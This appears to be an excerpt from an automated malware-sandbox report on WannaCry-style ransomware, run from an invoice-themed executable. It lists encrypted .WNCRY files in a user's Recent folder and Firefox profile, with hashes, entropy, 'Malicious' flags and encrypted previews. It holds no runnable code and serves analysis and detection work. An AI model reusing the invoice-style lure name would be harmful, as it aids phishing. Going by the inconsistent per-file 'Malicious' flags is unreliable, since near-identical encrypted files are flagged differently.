                                                          SHA-512:45C307B9B5DA5A60EA57CE37F6174D558BCC1766DC4790329C1FBD18CDA100F0C5D56710F27CECAA9B7C335F1C840F18AFCFC14AA33290602BD44DCBE9682A17
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l....3. OF.r.8\....ynO..$.>'F.O....g..A......,.....D.....V..<.7I...r.....Kk.T..L.........w.".D.....4...O...Q...m..u...-..8.....m..oU0..H.;.F.D.$.F.y..*6+...z...A.[.&.h@......A.F..LT......#......T..e...s.Zb5^. ....D.+.{..Bx....2.E..,......5............8......G.\..k..).x....E...-3..sJ..7k.a!............o..QK..u..A.cH...h$.[..K.k*Je..zZv|..-.Q3qn.zy..N..F_h...h...+y..oh....KZx....Y.]6.... Pq..Z.wn ....$..!.(S...^..Pp.Q.`l...-b...j...|J.C............Y=.t%@....vi..4...N.G...(.O....Ve.O......Y}<.....dbz2.DF...-p..oX-..!.z#6gZ...2...$..n...5C..+..H.|.mt..\...._!.."kEc...ew.Xf..a)/.".!).....z..pPL.,C..m.....].~.!.w..I...~..8]I~f}.g.6.Hoc1.m....C.J..\Zn3.+..a.6]..*.:............X{]...PH..A.g..|..+...*S.3..|...$+..s9Y..O..$....X.:....Q.Fs.4!&.k...B.=.VY..."..H=$..'....@.=.J!....p.6..........E........W.T.W.=.AC.G.YCC......h.4...Z..K.Q+YpK.P...........'V......=s...E...^.0..`Xp`...K$E.`.2.....\.).J....S.......`9.....{......D..R:..0S.#j.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834618125394637
                                                          Encrypted:false
                                                          SSDEEP:24:bkV8TGLdzcA9qbgT9pAObp8bpXWDNkTFX8fiOXLSUqBiIPrXtj7bR/e5lcjiAGx5:bkVgUJTAO0pXXBlOXNZIxBe/c3GL
                                                          MD5:DF7C3538E50D4E9B08011A658FB4EAC0
                                                          SHA1:C916C62B47B73FC89615EA9480785FB4316CA98B
                                                          SHA-256:0B5657B56341D0DE18CE3D2BE959F0FB1BD64A50DAA9F18DD4D78C6EB11167D5
                                                          SHA-512:45C307B9B5DA5A60EA57CE37F6174D558BCC1766DC4790329C1FBD18CDA100F0C5D56710F27CECAA9B7C335F1C840F18AFCFC14AA33290602BD44DCBE9682A17
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l....3. OF.r.8\....ynO..$.>'F.O....g..A......,.....D.....V..<.7I...r.....Kk.T..L.........w.".D.....4...O...Q...m..u...-..8.....m..oU0..H.;.F.D.$.F.y..*6+...z...A.[.&.h@......A.F..LT......#......T..e...s.Zb5^. ....D.+.{..Bx....2.E..,......5............8......G.\..k..).x....E...-3..sJ..7k.a!............o..QK..u..A.cH...h$.[..K.k*Je..zZv|..-.Q3qn.zy..N..F_h...h...+y..oh....KZx....Y.]6.... Pq..Z.wn ....$..!.(S...^..Pp.Q.`l...-b...j...|J.C............Y=.t%@....vi..4...N.G...(.O....Ve.O......Y}<.....dbz2.DF...-p..oX-..!.z#6gZ...2...$..n...5C..+..H.|.mt..\...._!.."kEc...ew.Xf..a)/.".!).....z..pPL.,C..m.....].~.!.w..I...~..8]I~f}.g.6.Hoc1.m....C.J..\Zn3.+..a.6]..*.:............X{]...PH..A.g..|..+...*S.3..|...$+..s9Y..O..$....X.:....Q.Fs.4!&.k...B.=.VY..."..H=$..'....@.=.J!....p.6..........E........W.T.W.=.AC.G.YCC......h.4...Z..K.Q+YpK.P...........'V......=s...E...^.0..`Xp`...K$E.`.2.....\.).J....S.......`9.....{......D..R:..0S.#j.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WQRYUPISBO.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838079479165363
                                                          Encrypted:false
                                                          SSDEEP:24:bky6WFqYq/S86uTj6dIk+/drVaC4gjLrqNxQpQ2ZIYtEYYkgWiCUhE2EtTU+Wg2:bkfYiS8bnLk+VrValcMxYhtd/gTC2Emp
                                                          MD5:066895FE875320C4E936BEA907FD234D
                                                          SHA1:2E5959F392D461C90C8F99798D67FF22568584DE
                                                          SHA-256:1138B580283CB730D951978BA9015788A33256DF22B55F7FD5ACB89653F0B257
                                                          SHA-512:F9169BC1F573AC79BBA2C238621B27810615EC3636814EB2B15D5510A61BC782A3331ACE67B2F07154C3A7585410634CD21149F206984F386E16FD7FFB40AEE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....L..9k..%X~....q.aH.{7.[...=.`GyM..l..s.YB(.||..f..m.l....x~.....VV;9g.|..o'...'..+.c3......]E....h...+...c..G.)I.!hWH./9O!..,qe...=x.&^.gX$..Q.......8n...".'..]W.B0.)..c.{u..3.^.......aX._.l.M..a.O..../.) .Z....4D.F..@..Ny...t.=.....9.o.v.<.24^...............D.....]..v...........f7.h2...R:..FP..^..~..Q...Wa.....E..........F....=....}....Rg...Mw.%.$<..c..v*d.z.=B.uxcw..pF.*+ey...N.g.b. .1..?.k.?.....).....,L.....U.yK....>.0...sxk>.....,.........g5.o|([..le..zw..a[..9^'....q..\...W..z.cr.y.....O.D..w.|.f.......2D./y..L[...4"@......y.F...b?.......7..]...Vs..*C34..T.6H..?..S.w....(..<..!....U8.z....$.fk..P.A.V4...g...R..Q...Ey.'=yR../.Y.3..fmZX?Wn:K...T].D. ....*...}.0..........,..j...C....A......v...W.*..zp.L.f.0;.>#.. U..[cp.E.eP.....TF.[.......Z...S......%#.... .....V..)c...).S^...k}.7...|...pW.>.....1.z.9x..2XH.....]2.&.. .X...D./..!K,d.....^x@.$..E(......p.....?e.'2.G....Y....2>Z.}./8..............f.Q..O@. ,#w?F..)!......m"..gw.4

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WQRYUPISBO.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838079479165363
                                                          Encrypted:false
                                                          SSDEEP:24:bky6WFqYq/S86uTj6dIk+/drVaC4gjLrqNxQpQ2ZIYtEYYkgWiCUhE2EtTU+Wg2:bkfYiS8bnLk+VrValcMxYhtd/gTC2Emp
                                                          MD5:066895FE875320C4E936BEA907FD234D
                                                          SHA1:2E5959F392D461C90C8F99798D67FF22568584DE
                                                          SHA-256:1138B580283CB730D951978BA9015788A33256DF22B55F7FD5ACB89653F0B257
                                                          SHA-512:F9169BC1F573AC79BBA2C238621B27810615EC3636814EB2B15D5510A61BC782A3331ACE67B2F07154C3A7585410634CD21149F206984F386E16FD7FFB40AEE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....L..9k..%X~....q.aH.{7.[...=.`GyM..l..s.YB(.||..f..m.l....x~.....VV;9g.|..o'...'..+.c3......]E....h...+...c..G.)I.!hWH./9O!..,qe...=x.&^.gX$..Q.......8n...".'..]W.B0.)..c.{u..3.^.......aX._.l.M..a.O..../.) .Z....4D.F..@..Ny...t.=.....9.o.v.<.24^...............D.....]..v...........f7.h2...R:..FP..^..~..Q...Wa.....E..........F....=....}....Rg...Mw.%.$<..c..v*d.z.=B.uxcw..pF.*+ey...N.g.b. .1..?.k.?.....).....,L.....U.yK....>.0...sxk>.....,.........g5.o|([..le..zw..a[..9^'....q..\...W..z.cr.y.....O.D..w.|.f.......2D./y..L[...4"@......y.F...b?.......7..]...Vs..*C34..T.6H..?..S.w....(..<..!....U8.z....$.fk..P.A.V4...g...R..Q...Ey.'=yR../.Y.3..fmZX?Wn:K...T].D. ....*...}.0..........,..j...C....A......v...W.*..zp.L.f.0;.>#.. U..[cp.E.eP.....TF.[.......Z...S......%#.... .....V..)c...).S^...k}.7...|...pW.>.....1.z.9x..2XH.....]2.&.. .X...D./..!K,d.....^x@.$..E(......p.....?e.'2.G....Y....2>Z.}./8..............f.Q..O@. ,#w?F..)!......m"..gw.4

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858463873480814
                                                          Encrypted:false
                                                          SSDEEP:24:bktmJ8NA7rXjBJfXq3AmyuWkiM6Jwk5ygLF3/r9/rXKn6wnaqeys4SNDiNUAM:bkMCi7ruAmZDiM6+dmF3/r9DXxwaTfNV
                                                          MD5:9D48A7325BD56F2B90D986CBF9EDE115
                                                          SHA1:49384ADD357F2E77B17772F9997DE9F281E40D35
                                                          SHA-256:584418AB1EBBB7D34C39FCBBAD35EA5F630DAD29450B65F99790FD07B464AC96
                                                          SHA-512:C8C8B71BBC71194F46E3774A75FA51367524FC782F79D6CFF02C1080FCA6A983B6D8DC5F88908C9858364B11C6C1018127D63A1C89FA1AB8BD0BB703ADBA4843
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........#0..l....3..../....`.=..vG.).{rr.`."....T.S.y....../..NP..k..&x.2M-...&BL<...wC..7....MIEeD.i......D.....Ze.yR0...|....... .6o.N.q........,.+].d{...hL.[9..6..F.zi...#.".@..>!.?B}+..f...P...f.a>.[..K.s=(A.N\.b.z..v..WW.=K[...Un.D4m$...T.=Y.Ur..............B.Y.[3tQ.|...\.q-.j....E./....N...w..8.@...i.'..d..,e./.dl"..].@[+..W.W..?.E`..KR..JU......3\..\...3...5%~TkP......xH..^h.Z.=.so......H...._....-..O.....:x!..3.7..5|s.3K.f.+.....0...."...."...M...0j...f......o.....`..I.\..,{R<C..G.....:'..tX!QS.d.W.x.a.!u.J9{l.......b.^S..WQ&K....l.".4......V..n..3..[}.....3...,..nUKsC..@...c. ..,.@...6...........$... ..G\.2.0.........U.G...'rmQw.R.f@..$5#..W.2E.d.p..x.J.B..)^^x........~l.^.)....O..-.;...i.$..w.:..9%.k!........<.(..)....'O...9."..)|.%{.s..N).+E2..+..........%.v../7..I.../....H.p..{.lZ&.e.......[......7......Gt.7.cK..73P6...F.......+...O_*t'..=.=..c.0........A.....c..;.KF......@_.>.t..x.$H?.p..,.....Bg.n...U....q.P.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858463873480814
                                                          Encrypted:false
                                                          SSDEEP:24:bktmJ8NA7rXjBJfXq3AmyuWkiM6Jwk5ygLF3/r9/rXKn6wnaqeys4SNDiNUAM:bkMCi7ruAmZDiM6+dmF3/r9DXxwaTfNV
                                                          MD5:9D48A7325BD56F2B90D986CBF9EDE115
                                                          SHA1:49384ADD357F2E77B17772F9997DE9F281E40D35
                                                          SHA-256:584418AB1EBBB7D34C39FCBBAD35EA5F630DAD29450B65F99790FD07B464AC96
                                                          SHA-512:C8C8B71BBC71194F46E3774A75FA51367524FC782F79D6CFF02C1080FCA6A983B6D8DC5F88908C9858364B11C6C1018127D63A1C89FA1AB8BD0BB703ADBA4843
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........#0..l....3..../....`.=..vG.).{rr.`."....T.S.y....../..NP..k..&x.2M-...&BL<...wC..7....MIEeD.i......D.....Ze.yR0...|....... .6o.N.q........,.+].d{...hL.[9..6..F.zi...#.".@..>!.?B}+..f...P...f.a>.[..K.s=(A.N\.b.z..v..WW.=K[...Un.D4m$...T.=Y.Ur..............B.Y.[3tQ.|...\.q-.j....E./....N...w..8.@...i.'..d..,e./.dl"..].@[+..W.W..?.E`..KR..JU......3\..\...3...5%~TkP......xH..^h.Z.=.so......H...._....-..O.....:x!..3.7..5|s.3K.f.+.....0...."...."...M...0j...f......o.....`..I.\..,{R<C..G.....:'..tX!QS.d.W.x.a.!u.J9{l.......b.^S..WQ&K....l.".4......V..n..3..[}.....3...,..nUKsC..@...c. ..,.@...6...........$... ..G\.2.0.........U.G...'rmQw.R.f@..$5#..W.2E.d.p..x.J.B..)^^x........~l.^.)....O..-.;...i.$..w.:..9%.k!........<.(..)....'O...9."..)|.%{.s..N).+E2..+..........%.v../7..I.../....H.p..{.lZ&.e.......[......7......Gt.7.cK..73P6...F.......+...O_*t'..=.=..c.0........A.....c..;.KF......@_.>.t..x.$H?.p..,.....Bg.n...U....q.P.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21400
                                                          Entropy (8bit):7.991318982496033
                                                          Encrypted:true
                                                          SSDEEP:384:sWE29Xb/mW3qoVdqLdEUr1QzraPWYUNnu9BS3wRj6YLJp+G5LPMqAXDlVvAoSJT:sbKXyoVA2UrO6P1FBS3qjdLJMKLolVA1
                                                          MD5:064B31824463D3FE960C36E4AEF6DAC1
                                                          SHA1:BC1A7F045EA15A6B05D0D4472B100E8FF292BF48
                                                          SHA-256:B17DF472DFCB905075AB24ABD1A2E1847935E66911869C39D1668CB490F3B354
                                                          SHA-512:B1A4B6015844D5064D59F158AD7581D8DCA679C0A1247EB4CAE783574B57C169C99D851FF2A9A75D5ECF320DC68097CC62830C9FD6FCF5CAECA61A913EADC0BC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T.b....V..yeDj..5W3....{.W...6.>*2.(*.p......g....Z.p............BB.H..C./US.....n..N.urV[....P>$.... E........7QS.b.3...=..;u.J.\..o..z....A(HR-.];...Y.%.'#..Z..d..r7 .s..X.E.<}B..a...&...i..._h/...>0....$.5...>W..(C...X...[...T.G%14~g3...T4.:....sR..........!...v..d...2.......j.o(2..!3..m6..N4.W..x4t...i9...y..!.0.T..I<.....D(.sh.D....`:..S8...i.uv\..0...]..1"..s...z...p..5!....Cx]U.MG......}.5`{..mq."...O.._..q1....E,.y.A?g .....b"b.|+......u.....,.`m..Z.....h....y....{...#5..k.......5.]......).Uin.m.q.I.sEr.c..6H....c'..)..<=`...U*..B{?.$..nn<w.#(b..f..2h..I..{....v.......c.o..'.+.?h.4...C...z.....9....YM..U....5.7...Q...t.G^......q..b.......c<.u.....v.X...z:G\@.a....1..A.....;...q.+...u..5h.I.?.ltq..,uz.=........(.x..q........-.3.f.{r2u..] gY..%.,....pq>...z..wn.DSK6.K..F.f.\>'..... ....9.."-..m..AN...D\..7t.|........g..X,}..~..JA"....(...ErE.8).....>...J:!Y........&....y.f ..H?u.:!DA...;zr.tH.@....vcl.. .._.........N...

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21400
                                                          Entropy (8bit):7.991318982496033
                                                          Encrypted:true
                                                          SSDEEP:384:sWE29Xb/mW3qoVdqLdEUr1QzraPWYUNnu9BS3wRj6YLJp+G5LPMqAXDlVvAoSJT:sbKXyoVA2UrO6P1FBS3qjdLJMKLolVA1
                                                          MD5:064B31824463D3FE960C36E4AEF6DAC1
                                                          SHA1:BC1A7F045EA15A6B05D0D4472B100E8FF292BF48
                                                          SHA-256:B17DF472DFCB905075AB24ABD1A2E1847935E66911869C39D1668CB490F3B354
                                                          SHA-512:B1A4B6015844D5064D59F158AD7581D8DCA679C0A1247EB4CAE783574B57C169C99D851FF2A9A75D5ECF320DC68097CC62830C9FD6FCF5CAECA61A913EADC0BC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T.b....V..yeDj..5W3....{.W...6.>*2.(*.p......g....Z.p............BB.H..C./US.....n..N.urV[....P>$.... E........7QS.b.3...=..;u.J.\..o..z....A(HR-.];...Y.%.'#..Z..d..r7 .s..X.E.<}B..a...&...i..._h/...>0....$.5...>W..(C...X...[...T.G%14~g3...T4.:....sR..........!...v..d...2.......j.o(2..!3..m6..N4.W..x4t...i9...y..!.0.T..I<.....D(.sh.D....`:..S8...i.uv\..0...]..1"..s...z...p..5!....Cx]U.MG......}.5`{..mq."...O.._..q1....E,.y.A?g .....b"b.|+......u.....,.`m..Z.....h....y....{...#5..k.......5.]......).Uin.m.q.I.sEr.c..6H....c'..)..<=`...U*..B{?.$..nn<w.#(b..f..2h..I..{....v.......c.o..'.+.?h.4...C...z.....9....YM..U....5.7...Q...t.G^......q..b.......c<.u.....v.X...z:G\@.a....1..A.....;...q.+...u..5h.I.?.ltq..,uz.=........(.x..q........-.3.f.{r2u..] gY..%.,....pq>...z..wn.DSK6.K..F.f.\>'..... ....9.."-..m..AN...D\..7t.|........g..X,}..~..JA"....(...ErE.8).....>...J:!Y........&....y.f ..H?u.:!DA...;zr.tH.@....vcl.. .._.........N...

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\AlternateServices.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.367682122684805
                                                          Encrypted:false
                                                          SSDEEP:12:bkE3vcfcu8l98vyOw2bqKRE1MBSdn0ZUxf24omMLUZ77Hf:bkaHL9aflbqN1MIB0ZeMoZ77Hf
                                                          MD5:FBE012A02B0A08D29CDB6CF0AFFCAE06
                                                          SHA1:1CB44F4AB8F732F799DC4A78BDCF9D6A23CEFDB0
                                                          SHA-256:562D83A60F16DD8CC7891E3CD7BDB0AB8DD3290AFFE5EA0181F78EE6C0FCCF2C
                                                          SHA-512:151FF6B17E15DF91DEB9BBEB48E625AAFFBE52EF7E0DB190287599A393AD0B0853F97B7078CFC00321BE0C982BFC2A934DDF5B6ADD6D0CE6BB707E9EE119EFD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....3......3.......W...6d....... .~.J..\...uN....aUY.6i.Pv.....^.....0!..-..L..c..V..n:.............Z.O.(.....f.%.W.I.(..K..T3g..|BJ.4.-|...R].. <...h0.:i.j]..^......r....kmV.@.WI.Z.9..Ud..... ..L3..Tl..4#N.....'..;....?..Z.-X].J..C.E.... ....................a7B.Q#.:....fbT.$2ow?C......)}.`.u....]K.d....CU.....E_V....E.M..k..w|h..U...JZ3.3.\6y.!.U......qP({..C`.[....7.VuY.:!YUk65..R...n..2R.........f...u.

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\AlternateServices.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.367682122684805
                                                          Encrypted:false
                                                          SSDEEP:12:bkE3vcfcu8l98vyOw2bqKRE1MBSdn0ZUxf24omMLUZ77Hf:bkaHL9aflbqN1MIB0ZeMoZ77Hf
                                                          MD5:FBE012A02B0A08D29CDB6CF0AFFCAE06
                                                          SHA1:1CB44F4AB8F732F799DC4A78BDCF9D6A23CEFDB0
                                                          SHA-256:562D83A60F16DD8CC7891E3CD7BDB0AB8DD3290AFFE5EA0181F78EE6C0FCCF2C
                                                          SHA-512:151FF6B17E15DF91DEB9BBEB48E625AAFFBE52EF7E0DB190287599A393AD0B0853F97B7078CFC00321BE0C982BFC2A934DDF5B6ADD6D0CE6BB707E9EE119EFD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....3......3.......W...6d....... .~.J..\...uN....aUY.6i.Pv.....^.....0!..-..L..c..V..n:.............Z.O.(.....f.%.W.I.(..K..T3g..|BJ.4.-|...R].. <...h0.:i.j]..^......r....kmV.@.WI.Z.9..Ud..... ..L3..Tl..4#N.....'..;....?..Z.-X].J..C.E.... ....................a7B.Q#.:....fbT.$2ow?C......)}.`.u....]K.d....CU.....E_V....E.M..k..w|h..U...JZ3.3.\6y.!.U......qP({..C`.[....7.VuY.:!YUk65..R...n..2R.........f...u.

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\SiteSecurityServiceState.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):824
                                                          Entropy (8bit):7.697720844564862
                                                          Encrypted:false
                                                          SSDEEP:24:bkFUfy49zojtgQO8pkuLkNb5rcjbiA7MFYQl:bkuKk0+QOHuLkNtrqbiLYQl
                                                          MD5:401B05F3EF0313001EC026939623351D
                                                          SHA1:276CFA022C3C152A11EA92BCBD90CEFEF5C695CE
                                                          SHA-256:2EEFA7605D5FE2A88C0DB14BDC078E457FBF03C6EF7207C884232CC57C33966E
                                                          SHA-512:80B2A55EB233650148A44F86C34CF5F4EEAE706F8B688EED5452424C2816AEF6A19B0FA064A7A2E35B9A0C715FAFDFAF5C0A2D7B4DB6A92BD3A4195216D0E5CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H(<..R.&.)...&X....uni.>......"...2..<K..'...E.<.K...a0.b.1.`.W......."..O.ty...e.Gq....X.8.U"'28...%..')..B...|....R`.U...v..1S1L6b`".`.g..&n....T..j..}.E..xl4.`.q.{.u..B.@.......7~1o...4.d.....:..Z.N$,......]kj.$N.1..:........$4R2...z...U+..............I.H..U."...K.s*..xU....L......rD.F-..B$q.c.....rC..6...O_p..k...kQw..QE)....w....r*..........F......s/....Hn.x.K.$.x.h.j...c......p.paE.....~.-|>zKf..W.a.8}F......|....{.}........6#.b<..y..x..`.Pt.q....j...G8.E..m....A.6.U.N.K..r{....w....v.Hf0...H.....".......W..O:.....4...ZNT...%.....+v%.e7......r8..R/."-.*..}b.o.e)....F..CYx.K.I..r.Qy..*.....Ls.. ..oC.....hB%r....67....+..,.~lc.../U{..*8.ez.....e8..5.......!.>K.t.B......Jt.......@t.......{..}-BM ..\.JKH..9.}...........w....L...4..[l..}.w......

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\SiteSecurityServiceState.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):824
                                                          Entropy (8bit):7.697720844564862
                                                          Encrypted:false
                                                          SSDEEP:24:bkFUfy49zojtgQO8pkuLkNb5rcjbiA7MFYQl:bkuKk0+QOHuLkNtrqbiLYQl
                                                          MD5:401B05F3EF0313001EC026939623351D
                                                          SHA1:276CFA022C3C152A11EA92BCBD90CEFEF5C695CE
                                                          SHA-256:2EEFA7605D5FE2A88C0DB14BDC078E457FBF03C6EF7207C884232CC57C33966E
                                                          SHA-512:80B2A55EB233650148A44F86C34CF5F4EEAE706F8B688EED5452424C2816AEF6A19B0FA064A7A2E35B9A0C715FAFDFAF5C0A2D7B4DB6A92BD3A4195216D0E5CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H(<..R.&.)...&X....uni.>......"...2..<K..'...E.<.K...a0.b.1.`.W......."..O.ty...e.Gq....X.8.U"'28...%..')..B...|....R`.U...v..1S1L6b`".`.g..&n....T..j..}.E..xl4.`.q.{.u..B.@.......7~1o...4.d.....:..Z.N$,......]kj.$N.1..:........$4R2...z...U+..............I.H..U."...K.s*..xU....L......rD.F-..B$q.c.....rC..6...O_p..k...kQw..QE)....w....r*..........F......s/....Hn.x.K.$.x.h.j...c......p.paE.....~.-|>zKf..W.a.8}F......|....{.}........6#.b<..y..x..`.Pt.q....j...G8.E..m....A.6.U.N.K..r{....w....v.Hf0...H.....".......W..O:.....4...ZNT...%.....+v%.e7......r8..R/."-.*..}b.o.e)....F..CYx.K.I..r.Qy..*.....Ls.. ..oC.....hB%r....67....+..,.~lc.../U{..*8.ez.....e8..5.......!.>K.t.B......Jt.......@t.......{..}-BM ..\.JKH..9.}...........w....L...4..[l..}.w......

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):229656
                                                          Entropy (8bit):7.999192480564572
                                                          Encrypted:true
                                                          SSDEEP:3072:iXkbqMYmv1El+KDzjIZG7jAQR+6ir3SXs1vOBYvCJ+xEbr+YxapMC3y7JMH/:iXkbvbvxcjnvjR+p3r19Id6YxauMH/
                                                          MD5:1B1366EE74DF208FBA3426F035B076F4
                                                          SHA1:D25A8E8913FFA45A6E1B8D144430AF033845C648
                                                          SHA-256:26CD51C8280BD8EFE81010CE2857AAF9D6A358B3E71AB6FE3D45E9F848A8B9DB
                                                          SHA-512:E60299C2D166CB6A6FB9E8524C253F70F9779AC83162EBDBDF1F5DB9E9E1862F62D33CC72A7123467D496C2B89CC0D4BD8D9B72F5070956B0BDC38EDA23A055E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....LL.;B.J%.*&Z.....:...4...m..~+....{.`k..........wU+..^bl...8...2[.Q&|p..wH....h........`......p......2.;.v..w2.&.d.^.2s..G.+..F.x....r..~...#.D...X.k.............5@.m.,..1..:>.........W?N\.....`h...$.'}..8KcE..t..'GG18[...>J.%..5.....}f.ea./m8_=.............p.O.... ..d.M4..'1.i..p'J~.3.cm.mC..S........aI...>...RH1.Z....cx...o..i..w..A....9.s.>..(..G...s....oOj...*2.....:..M..C..@].3x....-U)..j.n4._.*.Ys.T...R?.0n..@..[@..[C.b.....w./n.wu.....b4...D0dc....2u....E.x.qN.F.....}.$D0Ab..ai....J..vf.C...)zW.?....r'dA.v..D`{~..O.....cH)|.byR....'..&.@K..GPL...".[..[(..!zr!.I..MFE..7,.....h.....M)L...mH.......5....5.5..g8}.5.>[\R.=..^....37wnW..5..-=h_{.-....y?s.F.`.......Y.@.2...7...........|,.@......A...;...:,...'`l...K..............3..k_...3.{...(...Z.a9.\0K.Ct...;_.v.....2K........d..T?.]=\m(....4...@0...S]...+..En......"../$...L.....H&....[^...kb.0...Qy....1X&&H......kw1-..6.......)..A ........9c.5U.D<@..vA9.....[+.o.%..Y.E.....|-..<.*.D

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):229656
                                                          Entropy (8bit):7.999192480564572
                                                          Encrypted:true
                                                          SSDEEP:3072:iXkbqMYmv1El+KDzjIZG7jAQR+6ir3SXs1vOBYvCJ+xEbr+YxapMC3y7JMH/:iXkbvbvxcjnvjR+p3r19Id6YxauMH/
                                                          MD5:1B1366EE74DF208FBA3426F035B076F4
                                                          SHA1:D25A8E8913FFA45A6E1B8D144430AF033845C648
                                                          SHA-256:26CD51C8280BD8EFE81010CE2857AAF9D6A358B3E71AB6FE3D45E9F848A8B9DB
                                                          SHA-512:E60299C2D166CB6A6FB9E8524C253F70F9779AC83162EBDBDF1F5DB9E9E1862F62D33CC72A7123467D496C2B89CC0D4BD8D9B72F5070956B0BDC38EDA23A055E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....LL.;B.J%.*&Z.....:...4...m..~+....{.`k..........wU+..^bl...8...2[.Q&|p..wH....h........`......p......2.;.v..w2.&.d.^.2s..G.+..F.x....r..~...#.D...X.k.............5@.m.,..1..:>.........W?N\.....`h...$.'}..8KcE..t..'GG18[...>J.%..5.....}f.ea./m8_=.............p.O.... ..d.M4..'1.i..p'J~.3.cm.mC..S........aI...>...RH1.Z....cx...o..i..w..A....9.s.>..(..G...s....oOj...*2.....:..M..C..@].3x....-U)..j.n4._.*.Ys.T...R?.0n..@..[@..[C.b.....w./n.wu.....b4...D0dc....2u....E.x.qN.F.....}.$D0Ab..ai....J..vf.C...)zW.?....r'dA.v..D`{~..O.....cH)|.byR....'..&.@K..GPL...".[..[(..!zr!.I..MFE..7,.....h.....M)L...mH.......5....5.5..g8}.5.>[\R.=..^....37wnW..5..-=h_{.-....y?s.F.`.......Y.@.2...7...........|,.@......A...;...:,...'`l...K..............3..k_...3.{...(...Z.a9.\0K.Ct...;_.v.....2K........d..T?.]=\m(....4...@0...S]...+..En......"../$...L.....H&....[^...kb.0...Qy....1X&&H......kw1-..6.......)..A ........9c.5U.D<@..vA9.....[+.o.%..Y.E.....|-..<.*.D

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
